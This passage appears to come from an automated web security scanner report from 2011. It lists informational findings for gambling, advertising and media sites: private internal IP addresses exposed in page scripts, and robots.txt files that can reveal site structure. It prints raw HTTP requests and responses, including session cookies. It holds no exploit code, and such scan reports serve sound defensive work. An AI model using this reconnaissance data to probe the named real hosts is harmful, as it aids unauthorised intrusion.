<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head
...[SNIP]...
<script type="text/javascript">
var ClickTaleSSL=1;
ClickTaleFetchFrom="https://172.17.101.102//en/ClickTaleCache.ashx?t=56170aa6ad8875d2366cd7bfc005ba097df980a9";
if(typeof ClickTale=='function') ClickTale(29707,1,"www");
</script>
...[SNIP]...

22.51. https://www.interwetten.com/en/scratch/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.interwetten.com
Path:   /en/scratch/default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /en/scratch/default.aspx HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:40:11 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:40:10 GMT
Content-Length: 59162
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de" lang="de">
<head
...[SNIP]...
<script type="text/javascript">
var ClickTaleSSL=1;
ClickTaleFetchFrom="https://172.17.101.102//en/ClickTaleCache.ashx?t=fdff08148e5dd22787daac8a7655dc3f1c8e973e";
if(typeof ClickTale=='function') ClickTale(29707,1,"www");
</script>
...[SNIP]...

22.52. https://www.interwetten.com/en/skill/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.interwetten.com
Path:   /en/skill/default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /en/skill/default.aspx HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:40:06 GMT; path=/
Set-Cookie: __IW_CLIENT_TIMEZONE=11; expires=Wed, 16-May-2012 12:40:06 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:40:05 GMT
Content-Length: 75595
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head
...[SNIP]...
<script type="text/javascript">
var ClickTaleSSL=1;
ClickTaleFetchFrom="https://172.17.101.102//en/ClickTaleCache.ashx?t=95e5f4ac8035a9e72538f20064ff8bcaea242c56";
if(typeof ClickTale=='function') ClickTale(29707,1,"www");
</script>
...[SNIP]...

22.53. https://www.interwetten.com/es/Default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.interwetten.com
Path:   /es/Default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /es/Default.aspx HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: /sportsbook/default.aspx
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=es; expires=Sun, 16-May-2021 12:42:15 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:42:15 GMT
Content-Length: 911
Connection: close
Vary: Accept-Encoding

<html><head><title>Object moved</title></head><body><!-- ClickTale Top part -->
<script type="text/javascript">
var WRInitTime=(new Date()).getTime();
</script>
<!-- ClickTale end of Top part -->
...[SNIP]...
<script type="text/javascript">
var ClickTaleSSL=1;
ClickTaleFetchFrom="https://172.17.101.102//en/ClickTaleCache.ashx?t=ce3568f5fc5ca50c1baee5dbbef5003bdc708672";
if(typeof ClickTale=='function') ClickTale(29707,1,"www");
</script>
...[SNIP]...

22.54. https://www.interwetten.com/fr/Default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.interwetten.com
Path:   /fr/Default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /fr/Default.aspx HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: /sportsbook/default.aspx
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=fr; expires=Sun, 16-May-2021 12:42:13 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:42:12 GMT
Content-Length: 911
Connection: close
Vary: Accept-Encoding

<html><head><title>Object moved</title></head><body><!-- ClickTale Top part -->
<script type="text/javascript">
var WRInitTime=(new Date()).getTime();
</script>
<!-- ClickTale end of Top part -->
...[SNIP]...
<script type="text/javascript">
var ClickTaleSSL=1;
ClickTaleFetchFrom="https://172.17.101.102//en/ClickTaleCache.ashx?t=1482a78c0111dc0c8401cabb0bb466b53aeb34be";
if(typeof ClickTale=='function') ClickTale(29707,1,"www");
</script>
...[SNIP]...

22.55. https://www.interwetten.com/it/Default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.interwetten.com
Path:   /it/Default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /it/Default.aspx HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: /sportsbook/default.aspx
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=it; expires=Sun, 16-May-2021 12:42:17 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:42:17 GMT
Content-Length: 911
Connection: close
Vary: Accept-Encoding

<html><head><title>Object moved</title></head><body><!-- ClickTale Top part -->
<script type="text/javascript">
var WRInitTime=(new Date()).getTime();
</script>
<!-- ClickTale end of Top part -->
...[SNIP]...
<script type="text/javascript">
var ClickTaleSSL=1;
ClickTaleFetchFrom="https://172.17.101.102//en/ClickTaleCache.ashx?t=7f9e8db93092e23bcb485cf8c5f9a4bde18a2512";
if(typeof ClickTale=='function') ClickTale(29707,1,"www");
</script>
...[SNIP]...

22.56. https://www.interwetten.com/pt/Default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.interwetten.com
Path:   /pt/Default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /pt/Default.aspx HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: /sportsbook/default.aspx
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=pt; expires=Sun, 16-May-2021 12:43:05 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:43:05 GMT
Content-Length: 911
Connection: close
Vary: Accept-Encoding

<html><head><title>Object moved</title></head><body><!-- ClickTale Top part -->
<script type="text/javascript">
var WRInitTime=(new Date()).getTime();
</script>
<!-- ClickTale end of Top part -->
...[SNIP]...
<script type="text/javascript">
var ClickTaleSSL=1;
ClickTaleFetchFrom="https://172.17.101.102//en/ClickTaleCache.ashx?t=f580a09747be9643890852eaf55aa6bf3c4fb065";
if(typeof ClickTale=='function') ClickTale(29707,1,"www");
</script>
...[SNIP]...

22.57. https://www.interwetten.com/tr/Default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.interwetten.com
Path:   /tr/Default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /tr/Default.aspx HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: /sportsbook/default.aspx
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=tr; expires=Sun, 16-May-2021 12:43:10 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:43:10 GMT
Content-Length: 911
Connection: close
Vary: Accept-Encoding

<html><head><title>Object moved</title></head><body><!-- ClickTale Top part -->
<script type="text/javascript">
var WRInitTime=(new Date()).getTime();
</script>
<!-- ClickTale end of Top part -->
...[SNIP]...
<script type="text/javascript">
var ClickTaleSSL=1;
ClickTaleFetchFrom="https://172.17.101.102//en/ClickTaleCache.ashx?t=6c15a9a59fdf976137434df6114c679a0451036d";
if(typeof ClickTale=='function') ClickTale(29707,1,"www");
</script>
...[SNIP]...

22.58. http://www.metacafe.com/fplayer/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.metacafe.com
Path:   /fplayer/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /fplayer/ HTTP/1.1
Host: www.metacafe.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="NOI CUR ADM OUR NOR STA NID"
Content-Type: text/html
Date: Mon, 16 May 2011 12:25:14 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PHPSESSID=b34cef86fb081c11b18f1c7533ccdcf4; path=/; domain=.metacafe.com
Set-Cookie: OAGEO=US%7CTX%7CDallas%7C75207%7C32.7825%7C-96.8207%7C623%7C214%7C%7C%7C; path=/; domain=.metacafe.com
Set-Cookie: OAID=b26d5505ed27474ffea988f3d3dd0b02; expires=Tue, 15-May-2012 12:25:14 GMT; path=/; domain=.metacafe.com
Set-Cookie: User=%7B%22sc%22%3A1%2C%22visitID%22%3A%228744ed5d828ea0d23416bbe1e22d1055%22%2C%22LEID%22%3A40%2C%22LangID%22%3A%22en%22%2C%22npUserLocations%22%3A%5B244%5D%2C%22npUserLanguages%22%3A%5B9%5D%2C%22ffilter%22%3Atrue%2C%22pve%22%3A1%2C%22fbconnected%22%3Afalse%7D; expires=Sat, 14-May-2016 12:25:14 GMT; path=/; domain=.metacafe.com
Set-Cookie: dsavip=3333427372.20480.0000; expires=Mon, 16-May-2011 13:25:14 GMT; path=/
Content-Length: 73965

           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
           <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
tp:') {
                   iOmnitureMC = new OmnitureMC({"serverName":"256868-web52.metacafe.com","maxFlashVersion":"9","eVar1":"not logged-in","eVar2":"family filter on","prop1":40,"prop2":"C=244 L=9","server":"172.16.176.198","events":null,"prop46":"KPI-fplayer","pageName":"Metacafe homepage","channel":"Home","prop28":"3","prop34":"3"}, {"WikiRecentChanges":{"events":"event67"}});
               }
           }catch(e){}
    </script>
...[SNIP]...

23. Robots.txt file
There are 101 instances of this issue:

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.


23.1. http://ad-emea.doubleclick.net/ad/N5493.Ok/B4240999.6

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /ad/N5493.Ok/B4240999.6

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad-emea.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/plain
Content-Length: 101
Last-Modified: Thu, 18 Mar 2010 16:31:04 GMT
Date: Mon, 16 May 2011 11:41:05 GMT

User-Agent: AdsBot-Google
Disallow:

User-Agent: MSNPTC
Disallow:

User-agent: *
Disallow: /

23.2. http://ad.doubleclick.net/N6707/adj/meta.homepage/adminMsg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /N6707/adj/meta.homepage/adminMsg

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/plain
Content-Length: 101
Last-Modified: Thu, 18 Mar 2010 15:31:04 GMT
Date: Mon, 16 May 2011 12:49:31 GMT

User-Agent: AdsBot-Google
Disallow:

User-Agent: MSNPTC
Disallow:

User-agent: *
Disallow: /

23.3. http://api.twitter.com/1/Metacafe/lists/metacafe/statuses.json

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.twitter.com
Path:   /1/Metacafe/lists/metacafe/statuses.json

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: api.twitter.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:49:37 GMT
Server: Apache
Vary: Host,Accept-Encoding
Set-Cookie: k=173.193.214.243.1305550177720905; path=/; expires=Mon, 23-May-11 12:49:37 GMT; domain=.twitter.com
Last-Modified: Wed, 04 May 2011 17:32:26 GMT
Accept-Ranges: bytes
Content-Length: 26
Cache-Control: max-age=86400
Expires: Tue, 17 May 2011 12:49:37 GMT
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /

23.4. http://b.scorecardresearch.com/b

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 06 Jan 2010 17:35:59 GMT
Content-Length: 28
Content-Type: text/plain
Expires: Tue, 17 May 2011 12:49:29 GMT
Date: Mon, 16 May 2011 12:49:29 GMT
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

User-agent: *
Disallow: /

23.5. https://bingo.betsson.com/en/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://bingo.betsson.com
Path:   /en/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: bingo.betsson.com

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Type: text/plain
Expires: Tue, 17 May 2011 10:56:47 GMT
Last-Modified: Wed, 12 Jan 2011 16:05:16 GMT
Accept-Ranges: bytes
ETag: "1CBB27280604600"
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:58:53 GMT
Connection: close
Content-Length: 594

...User-agent: *
Disallow: /en/XmlData/
Disallow: /sv/XmlData/
Disallow: /fi/XmlData/
Disallow: /da/XmlData/
Disallow: /de/XmlData/
Disallow: /no/XmlData/
Disallow: /it/XmlData/
Disallow: /cs/
...[SNIP]...

23.6. http://blog.crazyscratch.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.crazyscratch.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: blog.crazyscratch.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain; charset=utf-8
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.2.13
Set-Cookie: _icl_current_language=en; expires=Tue, 17-May-2011 12:32:01 GMT; path=/
X-Pingback: http://blog.crazyscratch.com/xmlrpc.php
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:32:00 GMT
Connection: close
Content-Length: 24

User-agent: *
Disallow:

23.7. http://blog.deconcept.com/swfobject/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.deconcept.com
Path:   /swfobject/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: blog.deconcept.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:45:17 GMT
Server: Apache
Last-Modified: Sun, 15 Jun 2008 07:52:21 GMT
ETag: "64a2e08-a2-44fafca6f3740"
Accept-Ranges: bytes
Content-Length: 162
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

# robots.txt file for deconcept.com and blog.deconcept.com

# general crawlers

User-agent: *
Disallow: /dl
Disallow: /awstats

User-agent: duggmirror
Disallow: /

23.8. http://blog.postcodelottery.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.postcodelottery.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: blog.postcodelottery.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:32:17 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Pingback: http://blog.postcodelottery.com/xmlrpc.php
Content-Length: 81
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

Sitemap: http://blog.postcodelottery.com/sitemap.xml.gz

23.9. http://blog.primescratchcards.co.uk/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.primescratchcards.co.uk
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: blog.primescratchcards.co.uk

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:37:26 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://blog.primescratchcards.co.uk/xmlrpc.php
Set-Cookie: PHPSESSID=dvfgcrea9la1srqt23sue81ss2; path=/
Last-Modified: Mon, 16 May 2011 12:37:26 GMT
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

Sitemap: http://blog.primescratchcards.co.uk/sitemap.xml.gz

23.10. http://br.winnings.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://br.winnings.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: br.winnings.com

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/plain; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
ETag: ""
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.13
Set-Cookie: WinningsSID=18dfca8j0r01a5vat5695vsob5; path=/; domain=.winnings.com
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=winnings.com
Set-Cookie: winnings[sessionId]=103123656; path=/; domain=.winnings.com
Set-Cookie: winnings[vid]=541029; expires=Tue, 15-May-2012 12:45:44 GMT; path=/; domain=.winnings.com
X-Pingback: http://winnings.com/xmlrpc.php
Date: Mon, 16 May 2011 12:45:43 GMT
Connection: close
Content-Length: 24

User-agent: *
Disallow:

23.11. http://c.betrad.com/a/n/581/1296.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c.betrad.com
Path:   /a/n/581/1296.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: c.betrad.com

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "9152d7f1724ed8fbcd2e0c87029f193c:1276881254"
Last-Modified: Fri, 18 Jun 2010 17:14:14 GMT
Accept-Ranges: bytes
Content-Length: 25
Content-Type: text/plain
Date: Mon, 16 May 2011 12:52:26 GMT
Connection: close
X-N: S

User-agent: *
Disallow: /

23.12. http://creativecommons.org/licenses/by-sa/2.5/br/deed.en_US

Summary

Severity:   Information
Confidence:   Certain
Host:   http://creativecommons.org
Path:   /licenses/by-sa/2.5/br/deed.en_US

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: creativecommons.org

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Debian)
Last-Modified: Mon, 28 Feb 2011 21:56:17 GMT
ETag: "3458354-4f-49d5ebfc9c240"
Vary: Accept-Encoding
Content-Type: text/plain
X-Pad: avoid browser bug
Content-Length: 79
Date: Mon, 16 May 2011 12:02:09 GMT
X-Varnish: 406080266 406072227
Age: 83
Via: 1.1 varnish
Connection: close

User-agent: *
Disallow: /wp-admin
Disallow: /wp-includes
Disallow: /wp-content

23.13. http://d.tradex.openx.com/afr.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.tradex.openx.com
Path:   /afr.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: d.tradex.openx.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:52:09 GMT
Server: Apache
Last-Modified: Tue, 21 Dec 2010 00:56:43 GMT
ETag: "42be70-131-497e11c2d28c0"
Accept-Ranges: bytes
Content-Length: 305
Connection: close
Content-Type: text/plain; charset=UTF-8

# This robots.txt file requests that search engines and other
# automated web-agents don't try to index the files in this
# directory (/www/delivery/). This file is required in the
# event that you us
...[SNIP]...

23.14. http://d.xp1.ru4.com/um

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.xp1.ru4.com
Path:   /um

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: d.xp1.ru4.com

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Mon, 16 May 2011 12:52:13 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Content-type: text/plain
Last-modified: Fri, 31 Jul 2009 18:32:10 GMT
Content-length: 26
Etag: "1a-4a7338aa"
Accept-ranges: bytes
Connection: close

User-agent: *
Disallow: /

23.15. http://da.crazyscratch.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://da.crazyscratch.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: da.crazyscratch.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 21 Jan 2011 08:47:20 GMT
Accept-Ranges: bytes
ETag: "d05dbfd047b9cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:31:58 GMT
Connection: close
Content-Length: 28

User-agent: *
Disallow: /

23.16. http://da.winnings.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://da.winnings.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: da.winnings.com

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/plain; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
ETag: ""
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.13
Set-Cookie: WinningsSID=n9dek1nvr97u53o6m63skgb9l7; path=/; domain=.winnings.com
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=winnings.com
Set-Cookie: winnings[sessionId]=103123291; path=/; domain=.winnings.com
Set-Cookie: winnings[vid]=540668; expires=Tue, 15-May-2012 12:26:30 GMT; path=/; domain=.winnings.com
X-Pingback: http://winnings.com/xmlrpc.php
Date: Mon, 16 May 2011 12:26:30 GMT
Connection: close
Content-Length: 24

User-agent: *
Disallow:

23.17. http://de.crazyscratch.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://de.crazyscratch.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: de.crazyscratch.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 21 Jan 2011 08:47:29 GMT
Accept-Ranges: bytes
ETag: "b6facdd547b9cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:32:28 GMT
Connection: close
Content-Length: 28

User-agent: *
Disallow: /

23.18. http://de.winnings.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://de.winnings.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: de.winnings.com

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/plain; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
ETag: ""
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.13
Set-Cookie: WinningsSID=l7emqegl7b31i4oav7c9k9a893; path=/; domain=.winnings.com
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=winnings.com
Set-Cookie: winnings[sessionId]=103122875; path=/; domain=.winnings.com
Set-Cookie: winnings[vid]=540261; expires=Tue, 15-May-2012 12:00:29 GMT; path=/; domain=.winnings.com
X-Pingback: http://winnings.com/xmlrpc.php
Date: Mon, 16 May 2011 12:00:29 GMT
Connection: close
Content-Length: 24

User-agent: *
Disallow:

23.19. http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab

Summary

Severity:   Information
Confidence:   Certain
Host:   http://download.macromedia.com
Path:   /pub/shockwave/cabs/flash/swflash.cab

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: download.macromedia.com

Response

HTTP/1.0 200 OK
Server: Apache/2.0.52 (Unix)
Last-Modified: Wed, 09 Nov 2005 18:44:30 GMT
ETag: "1c91-1a-474d7f80"
Accept-Ranges: bytes
Content-Length: 26
Content-Type: text/plain
Date: Mon, 16 May 2011 11:46:24 GMT
Connection: close

User-agent: *
Disallow: /

23.20. https://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab

Summary

Severity:   Information
Confidence:   Certain
Host:   https://download.macromedia.com
Path:   /pub/shockwave/cabs/flash/swflash.cab

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: download.macromedia.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 09 Nov 2005 18:44:30 GMT
ETag: "2a203d-1a-474d7f80"
Accept-Ranges: bytes
Content-Length: 26
Content-Type: text/plain
Date: Mon, 16 May 2011 12:39:57 GMT
Connection: close

User-agent: *
Disallow: /

23.21. http://download.neogames-tech.com/Brands/MundiRasca/Website/General/BottomMenuBG.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://download.neogames-tech.com
Path:   /Brands/MundiRasca/Website/General/BottomMenuBG.jpg

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: download.neogames-tech.com

Response

HTTP/1.1 200 OK
Content-Length: 28
Content-Type: text/plain
Last-Modified: Mon, 27 Jul 2009 12:44:56 GMT
Accept-Ranges: bytes
ETag: "347f77bb8eca1:d66"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:37:56 GMT
Connection: close

User-agent: *
Disallow: /

23.22. https://download.neogames-tech.com/chat/chatstart.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://download.neogames-tech.com
Path:   /chat/chatstart.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: download.neogames-tech.com

Response

HTTP/1.1 200 OK
Content-Length: 28
